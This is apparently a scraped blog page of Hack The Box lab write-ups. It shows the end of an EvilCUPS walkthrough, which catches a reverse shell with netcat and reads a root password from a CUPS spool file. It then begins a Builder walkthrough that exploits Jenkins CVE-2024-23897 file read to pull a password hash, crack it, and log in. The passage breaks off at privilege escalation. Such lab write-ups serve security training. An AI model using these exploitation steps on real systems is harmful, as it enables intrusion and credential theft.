AAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CUPS GUI Print Test Page" title="" src="/static/4b4d97aae1b314574d3edb0ac4692afc/50637/cups-gui-print-test-page.png" srcset="/static/4b4d97aae1b314574d3edb0ac4692afc/dda05/cups-gui-print-test-page.png 158w, /static/4b4d97aae1b314574d3edb0ac4692afc/679a3/cups-gui-print-test-page.png 315w, /static/4b4d97aae1b314574d3edb0ac4692afc/50637/cups-gui-print-test-page.png 630w, /static/4b4d97aae1b314574d3edb0ac4692afc/45929/cups-gui-print-test-page.png 870w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After clicking "Print Test Page", <code class="language-text">nc</code> caught a shell as <code class="language-text">lp</code> which is the dedicated system account used for managing printing services:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EvilCUPS] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.15] from (UNKNOWN) [10.10.11.40] 37032 bash: cannot set terminal process group (1270): Inappropriate ioctl for device bash: no job control in this shell lp@evilcups:/$ id id uid=7(lp) gid=7(lp) groups=7(lp)</code></pre></div> <p>I upgraded the shell with the following commands:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm Ctrl + Z stty raw -echo; fg</code></pre></div> <p>The only user directory on the machine was <code class="language-text">htb</code>, to which <code class="language-text">lp</code> had read, write, and execute permissions:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">lp@evilcups:/$ cd home lp@evilcups:/home$ ls -la total 12 drwxr-xr-x 3 root root 4096 Sep 27 21:05 . drwxr-xr-x 18 root root 4096 Sep 28 11:15 .. drwxrwx--- 2 htb lp 4096 Sep 28 22:11 htb lp@evilcups:/home$ cd htb lp@evilcups:/home/htb$ ls -la total 24 drwxrwx--- 2 htb lp 4096 Sep 28 22:11 . drwxr-xr-x 3 root root 4096 Sep 27 21:05 .. lrwxrwxrwx 1 htb lp 9 Sep 28 11:12 .bash_history -> /dev/null -rwxrw---- 1 htb lp 220 Sep 27 21:05 .bash_logout -rwxrw---- 1 htb lp 3526 Sep 27 21:05 .bashrc -rwxrw---- 1 htb lp 807 Sep 27 21:05 .profile -rw-r--r-- 1 root htb 33 Oct 11 13:19 user.txt</code></pre></div> <p>The home directory of <code class="language-text">lp</code> was <code class="language-text">/var/spool/cups/tmp</code>, there wasn't anything useful there:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">lp@evilcups:/home/htb$ cd ~ lp@evilcups:~$ pwd /var/spool/cups/tmp lp@evilcups:~$ ls -la total 12 drwxrwx--T 2 root lp 4096 Oct 11 13:33 . drwx--x--- 3 root lp 4096 Oct 11 13:48 .. -rw------- 1 lp lp 146 Oct 11 13:40 .bash_history -rw------- 1 lp lp 0 Oct 11 13:28 cups-dbus-notifier-lockfile</code></pre></div> <p>When using CUPS, the <code class="language-text">lp</code> user manages files and directories related to printing. Job files are typically stored in <code class="language-text">/var/spool/cups/</code>. By default, the <code class="language-text">lp</code> user can access <code class="language-text">/var/spool/cups/</code> but cannot list its contents directly, as <code class="language-text">lp</code> only has execute permissions on <code class="language-text">/var/spool/cups/</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">lp@evilcups:~$ ls -ld /var/spool/cups drwx--x--- 3 root lp 4096 Oct 11 13:48 /var/spool/cups</code></pre></div> <p><code class="language-text">lp</code> does have read access to files in the cache, as long as the exact file name within the directory is provided. The CUPS documentation <a href="https://www.cups.org/doc/spec-design.html" target="_blank">here</a> states how job files are named:</p> <blockquote> <p>... control files starting with the letter "c" ("c00001", "c99999", "c100000", etc.) and data files starting with the letter "d" ("d00001-001", "d99999-001", "d100000-001", etc.) ...</p> </blockquote> <p>So, to view a data file, the format would be <code class="language-text">d&lt;job_id>-&lt;sequence_number></code>. As shown earlier in the web interface, the Jobs page displayed active and completed jobs, with one completed job listed having the ID "Canon_MB2300_series-1":</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a238198414ca2152e2d4a818a75f212a/20aec/cups-gui-show-all-jobs-id.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 50.632911392405056%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABfElEQVR42qWSW2vCQBCF4xUVTKIvFjVQMFGLShJvUcRc1FQsYkF8s2+i6C+w/8Sfe7o7kqilffLhYzaT4eyewwjFYhGapqHRaBC1Wo2o1+vQdR3VapX6lUoFvu/jcrlgMBjQt6IoRLlcDhEkSaJmPB6HIAjPk0qlkMvlEIvFqBGNRqmqqoperwfTNNFutx8wDIO9nLt4Q6Hw8ijILff7Fhsy4TguFosPzGbvOB6POJ2O2O/3OBwOIby/2+2wWn1ivd6wWAwSikQiV0Ge13K5wmTiw3UnTMzHfL5AqVQOX8yHA35bvPaj9/+EP4cSiQSSySREUQTPOZ/PUw36wQVBREElQUV5ZZZHaDaHDAt6s43hcMDy6oQ58tz4udPpwLIsOvMNcF0P5/M3ut3eTVBVNUync4ztCaa2h8VoDNtx2LAbYts2y9iB53ksvxU2mw1Vvkrb7RdardZNMJ1OQ5YlZkmELIlUudV7uN3gLMsywbcjm80ik8lQDP9m+Aw/pBsKYEAWF4IAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CUPS GUI All Jobs ID number" title="" src="/static/a238198414ca2152e2d4a818a75f212a/50637/cups-gui-show-all-jobs-id.png" srcset="/static/a238198414ca2152e2d4a818a75f212a/dda05/cups-gui-show-all-jobs-id.png 158w, /static/a238198414ca2152e2d4a818a75f212a/679a3/cups-gui-show-all-jobs-id.png 315w, /static/a238198414ca2152e2d4a818a75f212a/50637/cups-gui-show-all-jobs-id.png 630w, /static/a238198414ca2152e2d4a818a75f212a/20aec/cups-gui-show-all-jobs-id.png 873w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>"1" in "Canon_MB2300_series-1" corresponds to the job ID. Thus, the file name for the first sequence of the first job would be <code class="language-text">d00001-001</code>. Since <code class="language-text">lp</code> had read access to jobs in the cache, I could read the PostScript data from <code class="language-text">/var/spool/cups/d00001-001</code>. This revealed the contents of <code class="language-text">pass.txt</code>, which contained the password <code class="language-text">Br3@k-G!@ss-r00t-evilcups</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">lp@evilcups:~$ cat /var/spool/cups/d00001-001 %!PS-Adobe-3.0 %%BoundingBox: 18 36 577 806 %%Title: Enscript Output %%Creator: GNU Enscript 1.6.5.90 %%CreationDate: Sat Sep 28 09:31:01 2024 %%Orientation: Portrait %%Pages: (atend) %%DocumentMedia: A4 595 842 0 () () %%DocumentNeededResources: (atend) %%EndComments %%BeginProlog %%BeginResource: procset Enscript-Prolog 1.6.5 90 % % Procedures. % &lt;...snip...> /fname (pass.txt) def /fdir (.) def /ftail (pass.txt) def % User defined strings: /fmodstr (Sat Sep 28 09:30:10 2024) def /pagenumstr (1) def /user_header_p false def /user_footer_p false def %%EndPageSetup do_header 5 742 M (Br3@k-G!@ss-r00t-evilcups) s _R S %%Trailer %%Pages: 1 %%DocumentNeededResources: font Courier-Bold Courier %%EOF</code></pre></div> <p><code class="language-text">d00001-001</code> could also be copied locally and then converted into a PDF, which shows what was actually printed on the page:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EvilCUPS] └─$ ps2pdf d00001-001 d00001-001.pdf</code></pre></div> <p><code class="language-text">d00001-001.pdf</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/37b954745a9bee9b72cd9127f078beb6/e8a52/pass-txt.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 18.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAhElEQVR42o1P2wrFIAzz/79wDwoKog8T8bIbDM2hhR7GnhYIoYY0VW3bhuM4sO87xhggzDkh709feJ4nWmusgvu+OaeWZYG1Fs45DtPS67pgjIH3Hlpr1hgjQgis67qyTyqgUsoqaiqlcHNKCb135Jz/19RamV+h6Ez55hM0C9/z23vmfzSMNszd51MyAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="password in pass.txt" title="" src="/static/37b954745a9bee9b72cd9127f078beb6/50637/pass-txt.png" srcset="/static/37b954745a9bee9b72cd9127f078beb6/dda05/pass-txt.png 158w, /static/37b954745a9bee9b72cd9127f078beb6/679a3/pass-txt.png 315w, /static/37b954745a9bee9b72cd9127f078beb6/50637/pass-txt.png 630w, /static/37b954745a9bee9b72cd9127f078beb6/e8a52/pass-txt.png 666w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used this password to log in as the <code class="language-text">root</code> user:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">lp@evilcups:~$ su - Password: root@evilcups:~# id uid=0(root) gid=0(root) groups=0(root) root@evilcups:~# ls root.txt</code></pre></div>https://mgarrity.com/hack-the-box-builder/https://mgarrity.com/hack-the-box-builder/Thu, 29 Aug 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/85584571bdb1af1a87e6f89261c71cfc/3b67f/builder.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABE0lEQVR42mMQkdX+jwuLymn/F5LR+c8joQOmQXx86kGYAZ9hPBLa/yUVVP/raKn+l1JQ+88rqU3QUAZchvFJaf83N9T4358R+n//xJz/PcnB/00NNP7zETAUw0BRWZA3df9LKSr9709N/3961cP/X2+mAw29/r8vNeW/uLzSf2FZXRIMBLlOUu+/nr78/6Xl/f8Xd1//f3xqxf+ejL3/p2Q3/jfQVwLK6+J0JVYvC8lo/5dW1PrfGG//f+fipP8z6gP+N2cZ/8/zNfkvq6wDlicpDMWAtoMiwBQYhqvqff8/Xhz9f0GJ1X9DPTLCENnrvJJA10ir/VdXVwPSWuCIIiuWkV0qKqfzX1BaB8jWAfMJpUMAq14O06WT6mIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Builder" title="" src="/static/85584571bdb1af1a87e6f89261c71cfc/50637/builder.png" srcset="/static/85584571bdb1af1a87e6f89261c71cfc/dda05/builder.png 158w, /static/85584571bdb1af1a87e6f89261c71cfc/679a3/builder.png 315w, /static/85584571bdb1af1a87e6f89261c71cfc/50637/builder.png 630w, /static/85584571bdb1af1a87e6f89261c71cfc/fddb0/builder.png 945w, /static/85584571bdb1af1a87e6f89261c71cfc/3b67f/builder.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Builder is a Linux machine running a version of Jenkins with an arbitrary file read vulnerability via the CLI (CVE-2024-23897). This vulnerability can be exploited to extract a password hash for a user, which can then be cracked to gain access to the Jenkins instance. Privilege escalation can be achieved in two ways: first, by exposing the root SSH key through a pipeline script, and second, by decrypting an SSH key stored in the global credentials. The retrieved key allows SSH login as <code class="language-text">root</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ nmap -sC -sV -oA nmap/output 10.10.11.10 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 10:04 EDT Nmap scan report for 10.10.11.10 Host is up (0.051s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) |_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) 8080/tcp open http Jetty 10.0.18 |_http-title: Dashboard [Jenkins] |_http-server-header: Jetty(10.0.18) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION | http-robots.txt: 1 disallowed entry |_/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.73 seconds</code></pre></div> <p>I visited the Jenkins instance at <code class="language-text">http://10.10.11.10:8080</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/78273959d258dab98069249406b81443/029ca/default-jenkins-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 61.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABLUlEQVR42qWTW1KDQBBFZwH88tgBK9A/YQ1xD3GZKaNf8SNuQWNMeAsxPAYGrvQgRE1RVpGuOjVV9PSdvj0Du7m+gm1ZsGwbpmlCVVUYhg5d16Fp2oBhGFAUBbPZLVarJywW91guH1oesV4/Yz6/k7Xs5fUNm807PC+A6/pwHG+Avp0IZZ7w/fCMPsc458jzHE3T4GdUlcB+77TCLoIgxHa7Q5Zl+C9YkiSI41huJtEeIQQOh88B2lfX9ahQX8fSNJMFWZafbUrTvBWiXIGyFKNwXrVr1XVIlo/HVJ5Oruu6GTopirIdB5dFQtSj0HholYJUQB0WBZeCHQ2mhrQcBBGi6KM9pfrV4STB7paLb8vNMODJgnSbRCd0YrIgLoy/btilYvRTkEN6x/R0vgARwYgJN6DVpwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="default Jenkins page" title="" src="/static/78273959d258dab98069249406b81443/50637/default-jenkins-page.png" srcset="/static/78273959d258dab98069249406b81443/dda05/default-jenkins-page.png 158w, /static/78273959d258dab98069249406b81443/679a3/default-jenkins-page.png 315w, /static/78273959d258dab98069249406b81443/50637/default-jenkins-page.png 630w, /static/78273959d258dab98069249406b81443/fddb0/default-jenkins-page.png 945w, /static/78273959d258dab98069249406b81443/029ca/default-jenkins-page.png 1033w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>As shown in the bottom right of the page above, the installed version is <code class="language-text">Jenkins 2.441</code>. According to <a href="https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314" target="_blank">this</a> security advisory from Jenkins, version <code class="language-text">2.441</code> is affected by CVE-2024-23897, an arbitrary file read vulnerability through the CLI that can lead to RCE.</p> <p>The security advisory notes that Jenkins uses the <code class="language-text">args4j</code> library to handle CLI command arguments, which includes a feature that replaces an <code class="language-text">@</code> followed by a file path with the file's contents. This feature is enabled by default and remains active in Jenkins versions <code class="language-text">2.441</code> and earlier, including <code class="language-text">LTS 2.426.2</code> and earlier.</p> <p>So next, I needed to get the CLI client. The Jenkins documentation <a href="https://www.jenkins.io/doc/book/managing/cli/#downloading-the-client" target="_blank">here</a> states that it can be downloaded directly from the Jenkins controller at the URL <code class="language-text">JENKINS_URL/jnlpJars/jenkins-cli.jar</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ wget 10.10.11.10:8080/jnlpJars/jenkins-cli.jar --2024-08-26 10:07:49-- http://10.10.11.10:8080/jnlpJars/jenkins-cli.jar Connecting to 10.10.11.10:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 3623400 (3.5M) [application/java-archive] Saving to: ‘jenkins-cli.jar’ jenkins-cli.jar 100%[=========================>] 3.46M 2.03MB/s in 1.7s 2024-08-26 10:07:50 (2.03 MB/s) - ‘jenkins-cli.jar’ saved [3623400/3623400]</code></pre></div> <p>Once <code class="language-text">jenkins-cli.jar</code> was downloaded, running <code class="language-text">help</code> listed the available commands:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ java -jar jenkins-cli.jar -s http://10.10.11.10:8080 help Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true add-job-to-view Adds jobs to view. build Builds a job, and optionally waits until its completion. cancel-quiet-down Cancel the effect of the "quiet-down" command. clear-queue Clears the build queue. connect-node Reconnect to a node(s) console Retrieves console output of a build. &lt;...snip...> who-am-i Reports your credential and permissions.</code></pre></div> <p>For example, <code class="language-text">who-am-i</code> showed that I was authenticated as <code class="language-text">anonymous</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ java -jar jenkins-cli.jar -s http://10.10.11.10:8080 who-am-i Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Authenticated as: anonymous Authorities: anonymous</code></pre></div> <p>To exploit the arbitrary file read vulnerability, I used the <code class="language-text">help</code> command followed by <code class="language-text">'@/etc/passwd'</code> which revealed the first line of <code class="language-text">/etc/passwd</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ java -jar jenkins-cli.jar -s http://10.10.11.10:8080 help '@/etc/passwd' Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin java -jar jenkins-cli.jar help [COMMAND] Lists all the available commands or a detailed description of single command. COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)</code></pre></div> <p>I could view environment variables by reading <code class="language-text">/proc/self/environ</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ java -jar jenkins-cli.jar -s http://10.10.11.10:8080 help '@/proc/self/environ' Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true &lt;...snip...> ERROR: No such command HOSTNAME=0f52c222a4ccJENKINS_UC_EXPERIMENTAL=https://updates.jenkins.io/experimentalJAVA_HOME=/opt/java/openjdkJENKINS_INCREMENTALS_REPO_MIRROR=https://repo.jenkins-ci.org/incrementalsCOPY_REFERENCE_FILE_LOG=/var/jenkins_home/copy_reference_file.logPWD=/JENKINS_SLAVE_AGENT_PORT=50000JENKINS_VERSION=2.441HOME=/var/jenkins_homeLANG=C.UTF-8JENKINS_UC=https://updates.jenkins.ioSHLVL=0JENKINS_HOME=/var/jenkins_homeREF=/usr/share/jenkins/refPATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin. Available commands are above. </code></pre></div> <p>In the above output, the <code class="language-text">HOME</code> and <code class="language-text">JENKINS_HOME</code> environment variables were set to <code class="language-text">/var/jenkins_home</code>.</p> <p>Jenkins stores basic user information such as usernames and the corresponding directory names in <code class="language-text">$JENKINS_HOME/users/users.xml</code>. So in this case, it was <code class="language-text">/var/jenkins_home/users/users.xml</code>, however, only the first line was printed when trying to read the file with the <code class="language-text">help</code> command:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ java -jar jenkins-cli.jar -s http://10.10.11.10:8080 help '@/var/jenkins_home/users/users.xml' Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true ERROR: Too many arguments: &lt;hudson.model.UserIdMapper> java -jar jenkins-cli.jar help [COMMAND] Lists all the available commands or a detailed description of single command. COMMAND : Name of the command (default: &lt;?xml version='1.1' encoding='UTF-8'?>)</code></pre></div> <p>After trying some different commands, I found that <code class="language-text">connect-node</code> printed several more lines, revealing the directory name <code class="language-text">jennifer_12108429903186576833</code> for the user <code class="language-text">jennifer</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ java -jar jenkins-cli.jar -s http://10.10.11.10:8080 connect-node '@/var/jenkins_home/users/users.xml' Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true &lt;?xml version='1.1' encoding='UTF-8'?>: No such agent "&lt;?xml version='1.1' encoding='UTF-8'?>" exists. &lt;string>jennifer_12108429903186576833&lt;/string>: No such agent " &lt;string>jennifer_12108429903186576833&lt;/string>" exists. &lt;idToDirectoryNameMap class="concurrent-hash-map">: No such agent " &lt;idToDirectoryNameMap class="concurrent-hash-map">" exists. &lt;entry>: No such agent " &lt;entry>" exists. &lt;string>jennifer&lt;/string>: No such agent " &lt;string>jennifer&lt;/string>" exists. &lt;version>1&lt;/version>: No such agent " &lt;version>1&lt;/version>" exists. &lt;/hudson.model.UserIdMapper>: No such agent "&lt;/hudson.model.UserIdMapper>" exists. &lt;/idToDirectoryNameMap>: No such agent " &lt;/idToDirectoryNameMap>" exists. &lt;hudson.model.UserIdMapper>: No such agent "&lt;hudson.model.UserIdMapper>" exists. &lt;/entry>: No such agent " &lt;/entry>" exists.</code></pre></div> <p>Within Jenkins, more detailed user data could be found in:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">$JENKINS_HOME/users/&lt;user_directory_name>/config.xml</code></pre></div> <p>So I used the <code class="language-text">connect-node</code> command to read <code class="language-text">config.xml</code> for the user <code class="language-text">jennifer</code> which contained a password hash:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ java -jar jenkins-cli.jar -s http://10.10.11.10:8080 connect-node '@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml' Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true &lt;...snip...> &lt;?xml version='1.1' encoding='UTF-8'?>: No such agent "&lt;?xml version='1.1' encoding='UTF-8'?>" exists. &lt;fullName>jennifer&lt;/fullName>: No such agent " &lt;fullName>jennifer&lt;/fullName>" exists. &lt;seed>6841d11dc1de101d&lt;/seed>: No such agent " &lt;seed>6841d11dc1de101d&lt;/seed>" exists. &lt;id>jennifer&lt;/id>: No such agent " &lt;id>jennifer&lt;/id>" exists. &lt;version>10&lt;/version>: No such agent " &lt;version>10&lt;/version>" exists. &lt;tokenStore>: No such agent " &lt;tokenStore>" exists. &lt;filterExecutors>false&lt;/filterExecutors>: No such agent " &lt;filterExecutors>false&lt;/filterExecutors>" exists. &lt;io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>: No such agent " &lt;io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>" exists. &lt;passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a&lt;/passwordHash>: No such agent " &lt;passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a&lt;/passwordHash>" exists. ERROR: Error occurred while performing this command, see previous stderr output.</code></pre></div> <p>I used <code class="language-text">JtR</code> to crack the password:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Builder] └─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status princess (#jbcrypt) 1g 0:00:00:00 DONE (2024-08-26 10:11) 3.125g/s 112.5p/s 112.5c/s 112.5C/s 123456..liverpool Use the "--show" option to display all of the cracked passwords reliably Session completed.</code></pre></div> <p>With the credentials, I signed in to the Jenkins instance as the user <code class="language-text">jennifer</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/44a5b620ef82dd038977827948f6de73/79afa/log-in-to-jenkins.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 70.25316455696203%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAABpUlEQVR42qVTTU/CQBDtkRMHDkgCxBCv6k3wf2j8r2Agwb8iIgptd7ff25bnzpStULixyUu3OzNvdt5rnafHB0zGY0wmzxgMBmi32+h0Omi1WuZsjMVigel0htnsHfP5HMvlB95eXzDstnE/vMXdaITuTQ/9fh+9Xg/O6muDzeYXvi/huj52O68GnQVBVEOpEFIG8DzBcXfn855g652y3EPrHGVZorm01siyjJEk6cWc/X6PPM+RphmIy4miCEJIFEVxlrhefxvQBD/4/FwhDEPOy/OCSeyeGtp6R6nAXFcgjuMzQopJqRjUlBCGkclNQBdJkuSwjzm/JqQCCtjDirDkRtvtzmhEmrpMeJxzaTk0O41i9aECW0RGCKHMSLm5TWaaprxvgmKk3wmhJaGAJaWbu67HsJLY2DEsWU2olGJt/pOqYBQlPCZplKbaGFBeROVwNaFDRJ7ns8jNjmEYm5jkUbUumPQSlIqMywdCa3/T4UrD2IwrWEchAn5P0/wMUh4RUu2xEacfdsHjVIYkxgDNhU3Qef3Z4MrVNOhqQvolSTb7/APLGCBDlv1w+gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="log in to Jenkins" title="" src="/static/44a5b620ef82dd038977827948f6de73/50637/log-in-to-jenkins.png" srcset="/static/44a5b620ef82dd038977827948f6de73/dda05/log-in-to-jenkins.png 158w, /static/44a5b620ef82dd038977827948f6de73/679a3/log-in-to-jenkins.png 315w, /static/44a5b620ef82dd038977827948f6de73/50637/log-in-to-jenkins.png 630w, /static/44a5b620ef82dd038977827948f6de73/fddb0/log-in-to-jenkins.png 945w, /static/44a5b620ef82dd038977827948f6de73/79afa/log-in-to-jenkins.png 1078w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There are two ways to escalate privileges on this machine, one is by revealing the private SSH key for <code class="language-text">root</code> through a pipeline script, and the other is decrypting the private SSH key for <code class="language-text">root</code> from the global credentials.</p> <h5>Priv Esc Method: Pipeline Script</h5> <p>An SSH private key credential for <code class="language-text">root</code> was stored in <code class="language-text">Dashboard</code> → <code class="language-text">Manage Jenkins</code> → <code class="language-text">Credentials</code> → <code class="language-text">System</code> → <code class="language-text">Global credentials (unrestricted)</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ac0ba44387bbf2f6261b97b5878aaadf/1995d/global-credentials-root-user.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.30379746835443%; position: relative; bottom: 0; left: 0; background-image: 